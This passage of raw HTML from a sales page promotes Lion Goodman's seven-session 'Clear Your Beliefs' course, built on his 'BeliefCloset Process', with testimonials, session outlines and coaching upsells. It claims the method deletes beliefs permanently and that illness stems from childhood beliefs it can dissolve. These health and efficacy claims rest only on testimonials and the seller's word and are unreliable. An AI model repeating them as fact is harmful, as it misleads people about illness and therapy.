rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a 